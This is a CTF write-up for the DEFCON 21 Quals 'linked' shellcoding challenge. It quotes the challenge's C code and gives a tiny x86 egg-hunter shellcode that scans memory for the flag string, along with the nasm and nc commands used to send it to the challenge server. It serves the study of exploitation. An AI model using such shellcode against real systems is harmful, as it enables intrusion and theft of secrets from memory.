linked was a shellcoding challenge worth 3 points at DEFCON 21 CTF Quals

http://assets.shallweplayaga.me/linked.txt
Running at linked.shallweplayaga.me:22222 OR linked2.shallweplayaga.me:22222

linked.txt:

 typedef struct _llist {
   struct _llist *next;
   uint32_t tag;
   char data[100];
 llist;

and:

register char *answer;
char *(*func)();
llist *head;
...
func = (char *(*)(llist *))userBuf;
answer = (char *)(*func)(head);
send_string(answer);
exit(0);

Write me shellcode that traverses the randomly generated linked list, looking for a node with a tag 0x41414100, and returns a pointer to the data associated with that tag, such that the call to send_string will output the answer.

Tests showed that linked was running on x86. After trying to write and optimize shellcode for doing the job, I thought of an easier attack vector. Instead of writing the shellcode to find the node with the given tag, I thought of scanning memory in order to find the key directly (since all keys start with “The key is:”), much like an egg hunter. The shellcode turned out to be a whole lot shorter than the limit (a whole 2 bytes :).

Code:

bits 32

pop edx
pop eax
mov ebx, 'The '

_loop:
    inc eax
    cmp [eax], ebx
    jnz _loop

jmp edx

; yep, i can afford nops
nop
nop

See it in action:

x-n2o@istari:~$ nasm linked.asm -o linked
x-n2o@istari:~$ nc linked.shallweplayaga.me 22222 < linked
List built.  Send me your shellcode.  Max size: 16
The key is: Who says ESP isn't general purpose!?!?

~ X-N2O